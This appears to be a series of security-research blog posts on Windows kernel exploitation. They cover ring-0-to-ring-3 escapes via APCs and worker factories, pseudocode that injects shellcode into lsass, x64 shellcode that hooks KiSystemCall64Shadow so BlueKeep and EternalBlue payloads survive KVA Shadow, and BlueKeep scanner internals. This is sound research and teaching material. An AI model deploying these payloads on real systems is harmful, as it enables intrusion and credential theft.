So now that we've scanned all the offsets we can perform a copy. Allocate the stub, keeping in mind our new stub will be larger because of the MOVABS and JMP [$+0] we are adding. You'll have to do a couple of memcpy's using the mask scan offsets where we are going to replace the LEA and JMP rel-32 instructions. This clone step is only mildly annoying, but easy to mess up.

Next perform the following fixups:

  1. Overwrite the syscall opcode
  2. Change the LEA relative-32 to a MOVABS instruction
  3. Change the JMP relative-32 to a JMP [$+0]
  4. Place the nt!KiServiceInternal pointer at $+0

Now just cast it to a function pointer and call it!

Work Out

The Windows 10 Executive does now export some interesting functions like RtlCreateUserThread (no Heresy needed!), so an ultramodern payload likely has it easy. This was not the case when I checked the Windows 7 Executive (did not check 8).

Heresy's Gate techniques get you access to ZwCreateThread(Ex). You could also build out a ThreadContinue primitive using ZwSetContextThread. Also, PsSetContextThread is readily exported.

Well Known Ring 0 Escapes

I will describe a new method about how to escape with Worker Factories, however first let's gloss over existing methodologies being used.

Queuing a User Mode APC

Right now, all the hot exploits, malwares, and antiviruses seem to always be queuing user-mode Asynchronous Procedure Calls (APCs).

As far as I can tell, it's because _sleepya copypasta'd me (IMPORTANT: no disrespect whatsoever, everyone in this copypasta chain made MASSIVE improvements to each other) and I copypasta'd the Equation Group who copypasta'd Barnaby Jack, and people just use the available method because it's off-the-shelf code.

I originally got the idea from Luke Jennings' writeup on DoublePulsar's process injection, and through further analysis optimized a few things, including shrinking the overall shellcode to 14.41% of the original size.

APCs are a very complicated topic and I don't want to get too in the weeds. At a high level, they are how I/O callbacks can return data back to usermode, asynchronously without blocking. You can think of it like the heart of the Windows epoll/kqueue methods. Essentially, they help form a proactor (vs. reactor) pattern that fixed NT creator David Cutler's issues with Unix.

He expressed his low opinion of the Unix process input/output model by reciting "Get a byte, get a byte, get a byte byte byte" to the tune of the finale of Rossini's William Tell Overture.[citation needed]

It's worth noting Linux (and basically all modern operating systems) now have proactor pattern I/O facilities.

At any rate, the pseudo-code workflow is as follows:


target_thread = ...

KeInitializeApc(
    &apc,
    target_thread,
    mode = both,
    kernel_func = &kapc,
    user_func = NOT_NULL
);

KeInsertQueueApc(&apc);

--- ring 0 apc ---

kapc:
    mov cr8, PASSIVE_LEVEL

    *NormalRoutine = ZwAllocateVirtualMemory(RWX)
    _memcpy(*NormalRoutine, user_start)

    mov cr8, APC_LEVEL

--- ring 3 apc ---

user_start:
    CreateThread(&calc_shellcode)

calc_shellcode:

In summary:
  1. Find an Alertable + Waiting State thread.
  2. Create an APC on the thread.
  3. Queue the APC.
  4. In kernel routine, drop IRQL and allocate payload for the user-mode NormalRoutine.
  5. In user mode, spawn a new thread from the one we hijacked.

There's even more plumbing going on under the hood and it's actually a pretty complicated process. Do note that at least all required functions are readily exported. You can also do it without a kernel-mode APC, so you don't have to manually adjust the IRQL (however the methodology introduces its own complexities).

Also note that the target thread not only needs to be Alertable, it needs to be in a Waiting State, which is fairly hard to check in a cross-version way. You can DKOM traverse EPROCESS.ThreadListHead backwards as non-Alertable threads are always the first ones. If the thread is not in a Waiting State, the call to KeInsertQueueApc will return an NT error. The injected process will also crash if TEB.ActivationContextStackPointer is NULL.

A more verbose version of the technique I believe was first described in 2005 by Barnaby Jack in the paper Remote Windows Kernel Exploitation: Step Into the Ring 0. The technique may have been known before 2005, however this is not documented functionality so would be rare for a normal driver writer to have stumbled on it. Matt Suiche attempted to document the history of the APC technique and has a similar finding as Barnaby Jack being the original discoverer.

Driver code that implements the APC technique to inject a DLL into a process from the kernel is provided by Petr Beneš. There's also a writeup with some C code in the Vault7 leak.

The method is also available in x64 assembly in places such as the Metasploit BlueKeep exploit; sleepya_ and I have (noncollaboratively) built upon each other's work over the past few years to improve the payload. Indeed this shellcode is the basis for the SMBGhost exploits released by both ZecOps and chompy1337.

This abuse of APC queuing has been such a thorn in Microsoft's side that they added ETW tracing for antivirus to it: on more recent versions the tail end of NtQueueApcThreadEx() calls EtwTiLogQueueApcThread(). There have been some documented bypasses. There have also been issues in SMBGhost where CFG didn't like the user mode APC start address, which hugeh0ge found a workaround for.

SharedUserData SystemCall Hook (+ Others)

APCs are one of several methods described by bugcheck and skape in Uninformed's Windows Kernel-Mode Payload Fundamentals. Another is called SharedUserData SystemCall Hook.

The only exploit prior to EternalBlue in Metasploit that required this type of kernel mode payload was MS09-050, in x86 shellcode only.

Stephen Fewer had a writeup of how the MS09-050 Metasploit shellcode performed this system call hook.

  1. Hook syscall MSR.
  2. Wait for desired process to make a syscall.
  3. Allocate the payload.
  4. Overwrite the user-mode return address for the syscall at the desired payload.

There's a bit of glue required to fix up the hijacked thread.

Worker Factory Internals

Why Worker Factories? They're ETW detecting us with APCs, dog; it's time to evolve.

I was originally investigating Worker Factories as a potential user mode process migration technique that avoided the CreateRemoteThread() and QueueUserApc() primitives (and many similar well-known methods).

I discovered you cannot create a Worker Factory in another process. However, in Windows 10 all processes that load ntdll receive a thread pool, and thus implicitly have a Worker Factory! To speed up loading DLLs or something.

I was able to succeed in messing with the properties of this default Worker Factory, but I did not readily see a way to update the start routine for threads in the pool. I also saw some pointers in NTDLL thread pool functions which perhaps could be adjusted to get the process migration to pop. More research is needed.

I instead decided to try it as a Ring 0 escape, and here we are.

NTDLL Thread Pool Implementation

Worker Factories are handles that ntdll communicates with when you use the Thread Pool APIs. These essentially just let you have user-mode work queues that you can post tasks to. Most of the logic is inside ntdll, with the function prefixes Tp and Tpp. This is good, because it means the environment can be adjusted without a context switch, and generally adding additional complexity to kernels should be avoided when possible.

It is very easy to create a worker factory, and a process can have many of them. The Windows Internals books have a few pages on them (here is an excerpt from the older 5th edition).

The entire kernel mode API is implemented with the following syscalls:

  1. ZwCreateWorkerFactory()
  2. ZwQueryInformationWorkerFactory()
  3. ZwSetInformationWorkerFactory()
  4. ZwWaitForWorkViaWorkerFactory()
  5. ZwWorkerFactoryWorkerReady()
  6. ZwReleaseWorkerFactoryWorker()
  7. ZwShutdownWorkerFactory()

As ntdll does all the heavy lifting, nothing in the kernel interacts with these functions. As such they are not exported, and require Heresy's Gate.

ntdll creates a worker factory, adjusts its parameters such as minimum threads, and uses the other syscalls to inform the kernel that tasks are ready to be run. Worker threads will eat the user-mode work queues to exhaustion before returning to the kernel to wait to be explicitly released again.

The main takeaway so far is: the kernel creates and manages the threads. ntdll manages the work items in the queue.

Creating a Worker Factory

The create syscall has the following prototype:


NTSTATUS NTAPI
ZwCreateWorkerFactory(
    _Out_ PHANDLE WorkerFactoryHandleReturn,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE CompletionPortHandle,
    _In_ HANDLE WorkerProcessHandle,
    _In_ PVOID StartRoutine,
    _In_opt_ PVOID StartParameter,
    _In_opt_ ULONG MaxThreadCount,
    _In_opt_ SIZE_T StackReserve,
    _In_opt_ SIZE_T StackCommit
);

The most interesting parameter for us is the StartRoutine/StartParameter. This will be our Ring 3 code we wish to execute, and anything we want to pass it directly.

The WorkerProcessHandle parameter accepts the generic "current process" handle of -1, so there is no need to create a proper handle for the process if you are already in the same process context. In kernel mode, this means using KeStackAttachProcess(). As I mentioned earlier, you cannot create a Worker Factory for another process.

The reverse engineered pseudocode is:


ObpReferenceObjectByHandleWithTag(
    WorkerProcessHandle,
    ...,
    PsProcessType,
    &Process
);

if (KeGetCurrentThread()->ApcState.Process != Process)
{
    return STATUS_INVALID_PARAMETER;
}

The create function also requires an I/O completion port. This can be gained using ZwCreateIoCompletion(), which is a readily exported function by the Executive.

You also must specify some access rights for the WorkerFactoryHandle:


#define WORKER_FACTORY_RELEASE_WORKER 0x0001
#define WORKER_FACTORY_WAIT 0x0002
#define WORKER_FACTORY_SET_INFORMATION 0x0004
#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
#define WORKER_FACTORY_READY_WORKER 0x0010
#define WORKER_FACTORY_SHUTDOWN 0x0020

#define WORKER_FACTORY_ALL_ACCESS ( \
STANDARD_RIGHTS_REQUIRED | \
WORKER_FACTORY_RELEASE_WORKER | \
WORKER_FACTORY_WAIT | \
WORKER_FACTORY_SET_INFORMATION | \
WORKER_FACTORY_QUERY_INFORMATION | \
WORKER_FACTORY_READY_WORKER | \
WORKER_FACTORY_SHUTDOWN \
)

Greetz to Process Hacker for reversing these definitions. Note, however, that WORKER_FACTORY_ALL_ACCESS evaluates to 0xF003F, whereas the modern Windows 10 ntdll creates the worker factory with the mask 0xF00FF. We only really need WORKER_FACTORY_SET_INFORMATION, but passing a totally full mask shouldn't be an issue (even on older versions).
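The mask arithmetic can be checked with a few lines of C. This is only a sketch: the STANDARD_RIGHTS_REQUIRED value is the usual Windows SDK value repeated here so the snippet builds anywhere, and extra_mask_bits is a hypothetical helper name, not something from ntdll or Process Hacker.

```c
#include <assert.h>
#include <stdint.h>

/* Values copied from the definitions above. STANDARD_RIGHTS_REQUIRED is the
   usual Windows SDK value, repeated so this sketch builds without <windows.h>. */
#define STANDARD_RIGHTS_REQUIRED         0x000F0000u
#define WORKER_FACTORY_RELEASE_WORKER    0x0001u
#define WORKER_FACTORY_WAIT              0x0002u
#define WORKER_FACTORY_SET_INFORMATION   0x0004u
#define WORKER_FACTORY_QUERY_INFORMATION 0x0008u
#define WORKER_FACTORY_READY_WORKER      0x0010u
#define WORKER_FACTORY_SHUTDOWN          0x0020u

#define WORKER_FACTORY_ALL_ACCESS ( \
    STANDARD_RIGHTS_REQUIRED | \
    WORKER_FACTORY_RELEASE_WORKER | \
    WORKER_FACTORY_WAIT | \
    WORKER_FACTORY_SET_INFORMATION | \
    WORKER_FACTORY_QUERY_INFORMATION | \
    WORKER_FACTORY_READY_WORKER | \
    WORKER_FACTORY_SHUTDOWN)

/* Compile-time check of the value quoted in the text. */
static_assert(WORKER_FACTORY_ALL_ACCESS == 0xF003Fu,
              "documented rights should OR together to 0xF003F");

/* Hypothetical helper: which bits of an observed mask are not covered by the
   documented rights above? */
uint32_t extra_mask_bits(uint32_t observed_mask)
{
    return observed_mask & ~(uint32_t)WORKER_FACTORY_ALL_ACCESS;
}
```

Feeding it the 0xF00FF mask seen in Windows 10 ntdll leaves bits 0x40 and 0x80, which have no name in the definitions above.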

Adjusting Worker Factory Minimum Threads

By default, it appears just creating a Worker Factory does not immediately gain you any new threads in the target process.

However, you can tune the minimum number of threads with the following function:


NTSTATUS WINAPI
NtSetInformationWorkerFactory(
_In_ HANDLE WorkerFactoryHandle,
_In_ ULONG WorkerFactoryInformationClass,
_In_ PVOID WorkerFactoryInformation,
_In_ ULONG WorkerFactoryInformationLength
);

The enumeration of options:

typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // q; s: LARGE_INTEGER
WorkerFactoryRetryTimeout, // q; s: LARGE_INTEGER
WorkerFactoryIdleTimeout, // q; s: LARGE_INTEGER
WorkerFactoryBindingCount,
WorkerFactoryThreadMinimum, // q; s: ULONG
WorkerFactoryThreadMaximum, // q; s: ULONG
WorkerFactoryPaused, // ULONG or BOOLEAN
WorkerFactoryBasicInformation, // WORKER_FACTORY_BASIC_INFORMATION
WorkerFactoryAdjustThreadGoal,
WorkerFactoryCallbackType,
WorkerFactoryStackInformation, // 10
WorkerFactoryThreadBasePriority,
WorkerFactoryTimeoutWaiters, // since THRESHOLD
WorkerFactoryFlags,
WorkerFactoryThreadSoftMaximum,
WorkerFactoryThreadCpuSets, // since REDSTONE5
MaxWorkerFactoryInfoClass
} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;

Shout out again to Process Hacker for providing us with these definitions.

Step Into the Ring 3

The pseudocode workflow for Work Out is as follows:


PsLookupProcessByProcessId(pid, &lsass)

KeStackAttachProcess(lsass)

start_addr = ZwAllocateVirtualMemory(RWX)
_memcpy(start_addr, shellcode)

ZwCreateIoCompletion(&hio)

__ZwCreateWorkerFactory(&hWork, hio, start_addr)

__ZwSetInformationWorkerFactory(hWork, min_threads = 1)

KeUnstackDetachProcess(lsass)

ObDereferenceObject(lsass)

  1. Attach to the process.
  2. Allocate the user mode payload.
  3. Create an I/O completion handle.
  4. Create a worker factory with the start routine being the payload.
  5. Adjust minimum threads to 1.

For reference, see inect.c in the PoC code on GitHub.

Conclusion

I have left other ideas in this post for Ring 0 Escapes that may be worth proving out, as an open problem for the reader.

If you think of other techniques for Heresy's Gate or Ring 0 Escapes, or just want to troll me, be sure to leave a comment!

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

- Worawit Wang (@sleepya_), November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently break the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors load, evaluate, and branch ("speculate") well before these operations are "actually" due to run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
  • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  • Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

    NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

    Existing Remote Kernel Payloads

    The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

    Hooking IA32_LSTAR MSR

    In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

    To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

    One of the easiest, hackiest, and most KPP-detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc0000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

    User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

    Double Fault Root Cause Analysis

    Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with an UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

    We can see that at this point, user mode can see the KiSystemCall64Shadow function:

    However, user mode cannot see our shellcode location:

    The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

    Hooking KiSystemCall64Shadow

    So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

    Heuristic Offset Detection

    We want to accomplish two things:

    1. Install our hook in a spot after kernel pages CR3 is loaded.
    2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

    For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is only 2 bytes long (6a 2b, also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 as a little-endian dword, i.e. the bytes 00 6a 2b 65), as the preceding and following bytes are stable in all versions of ntoskrnl that I analyzed.

    The following shellcode is the 0th stage that runs after exploitation:


    payload_start:
    ; read IA32_LSTAR
    mov ecx, 0xc0000082
    rdmsr

    shl rdx, 0x20
    or rax, rdx
    push rax

    ; rsi = &KiSystemCall64Shadow
    pop rsi

    ; this loop stores the offset to push 2b into ecx
    _find_push2b_start:
    xor ecx, ecx
    mov ebx, 0x652b6a00

    _find_push2b_loop:
    inc ecx
    cmp ebx, dword [rsi + rcx - 1]
    jne _find_push2b_loop

    This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

    The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.
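For readers who find C easier to follow than the assembly, the scan can be sketched as below. This is not the payload itself: find_push2b is a hypothetical name, and unlike the shellcode loop (which assumes the pattern is always present) this version takes a length and stops at the end of the buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Bytes 00 6a 2b 65: the stable byte before push 2b, the push itself (6a 2b),
   and the stable byte after it. */
static const uint8_t PUSH2B_PATTERN[4] = { 0x00, 0x6a, 0x2b, 0x65 };

/* Returns the offset of the push 2b instruction (the 6a byte) from the start
   of `code`, or -1 if the pattern is not found within `len` bytes. The +1
   mirrors the shellcode, where ecx ends up one past the matched 00 byte. */
long find_push2b(const uint8_t *code, size_t len)
{
    assert(code != NULL);
    for (size_t i = 0; i + sizeof(PUSH2B_PATTERN) <= len; i++) {
        if (memcmp(code + i, PUSH2B_PATTERN, sizeof(PUSH2B_PATTERN)) == 0)
            return (long)(i + 1);
    }
    return -1;
}
```

Matching on four bytes instead of two reduces the chance of landing on an unrelated 6a 2b inside some other instruction's operand.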

    Atomic x64 Function Hooking

    It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b instruction!

    Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

    We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:


    ; install hook call in KiSystemCall64Shadow NOP padding
    install_big_jmp:

    ; bytes 90 57 48 bf = nop; push rdi; movabs rdi, &fake_syscall_hook (imm64 follows)
    mov dword [rsi - 0x10], 0xbf485790
    lea rdi, [rel fake_syscall_hook]
    mov qword [rsi - 0xc], rdi

    ; bytes 57 c3 = push rdi; ret
    mov word [rsi - 0x4], 0xc357

    ; ...

    fake_syscall_hook:

    ; ...

    Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

    Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.


    ; install tiny jmp to the NOP padding jmp
    install_small_jmp:

    ; rsi = &syscall+push2b
    add rsi, rcx

    ; eax = jmp -x
    ; fix -x to actual offset required
    mov eax, 0xfeeb
    shl ecx, 0x8
    sub eax, ecx
    sub eax, 0x1000

    ; push 2b => jmp -x;
    mov word [rsi], ax
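The arithmetic on 0xfeeb can look cryptic, so here is the same computation as a C sketch. The function names are hypothetical, and the 0x6e bound is my own derivation from the rel8 range rather than something the shellcode checks.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors the shellcode: start from eb fe (jmp to self, rel8 = -2), then
   subtract the push 2b offset and 0x10 from the rel8 byte so the jump lands
   0x10 bytes before the start of the syscall routine. */
uint16_t small_jmp_word(uint32_t push2b_offset)
{
    /* rel8 = -(offset + 0x12) must fit in a signed byte (>= -128). */
    assert(push2b_offset <= 0x6e);
    uint32_t eax = 0xfeeb;          /* bytes eb fe in memory */
    eax -= push2b_offset << 8;      /* adjust only the rel8 byte */
    eax -= 0x1000;                  /* another 0x10 back, into the padding */
    return (uint16_t)eax;
}

/* Where the jump lands, relative to the start of the syscall routine. */
int32_t small_jmp_target(uint32_t push2b_offset)
{
    int8_t rel8 = (int8_t)(uint8_t)(small_jmp_word(push2b_offset) >> 8);
    /* rel8 is relative to the end of the 2-byte jmp instruction */
    return (int32_t)push2b_offset + 2 + rel8;
}
```

For a made-up offset of 0x20 the word is 0xceeb (bytes eb ce), and the computed target is -0x10 for any offset in range, which is where the BIG JMP was written.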

    And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

    On the next system call, the kernel stack and page tables will be loaded, our small jmp hook will go to the big jmp, which in turn will go to our fake syscall handler at PASSIVE_LEVEL.

    Cleaning Up the Hook

    Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:


    ; this syscall hook is called AFTER kernel stack+KVA shadow is setup
    fake_syscall_hook:

    ; save all volatile registers
    push rax
    push rbp
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    mov rbp, STAGE_SHARED_MEM

    ; use lock cmpxchg for queueing APC only one at a time
    single_thread_gate:
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
    jnz _restore_syscall

    ; only 1 thread has this lock
    ; allow interrupts while executing ring0 to ring3
    sti
    call r0_to_r3
    cli

    ; all threads can clean up
    _restore_syscall:

    ; calculate offset to 0x2b using shared storage
    mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
    mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
    add rdi, rax

    ; atomic change small jmp to push 2b
    mov word [rdi], 0x2b6a

    All threads restore the push 2b, as the code flow results in fewer bytes, no extra locking, and shouldn't matter.

    Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.


    _syscall_hook_done:

    ; restore register values
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

    ; rdi still holds the push 2b address (syscall + offset)!
    ; but the original rdi needs to be restored

    ; do not cause bugcheck 0xc4 arg1=0x91
    mov qword [rsp-0x20], rdi
    pop rdi

    ; return to &KiSystemCall64Shadow+push2b
    jmp [rsp-0x28]

    You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

    Conclusion

    Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

    It's simple, it's obvious, it's hacky; but it works and so it's what you want.

    Avoiding the DoS: How BlueKeep Scanners Work

    Background

    On May 21, @JaGoTu and I released a proof-of-concept on GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

    Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

    Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

    RDP Channel Internals

    The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

    The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

    There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

    That should be enough information to follow the rest of this post. More background information is available from ZDI.

    MS_T120 I/O Completion Packets

    After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

    The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

    Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

    MS_T120 Port Data Dispatch

    On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

    We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

      0x0 - rdpwsx!HandleConnectProviderIndication
      0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

    If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

    Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

    Patch Detection

    I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

    It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper cleanup. There should not be risk of denial-of-service.

    The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

    Vulnerable Host Behavior

    On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to clean up and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

    And of course, with an invalid size, you RCE/BSoD.

    Patched Host Behavior

    However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

    In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.

    CPU Architecture Differences

    Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes on the two architectures, so one might think that sending both at once would cause the denial-of-service.

    Simply put, besides the sizes being different, the message opcode is at a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored.

    This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

    Conclusion

    This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis.

    Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

    To my knowledge, the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related to the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.

    Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

    See Also: Dissecting a Bug in the EternalRomance Client (FuzzBunch)

    Background

    Pwning Windows 7 was no problem, but I would revisit the EternalBlue exploit against Windows XP from time to time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

    Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

    Why did this exploit work in the wild but not against runs in my "lab"?

    tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs cause FuzzBunch's XP payload to abort prematurely on single-core installs.

    Multiple Exploit Chains

    Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by myself and JennaMagius as well as sleepya_.

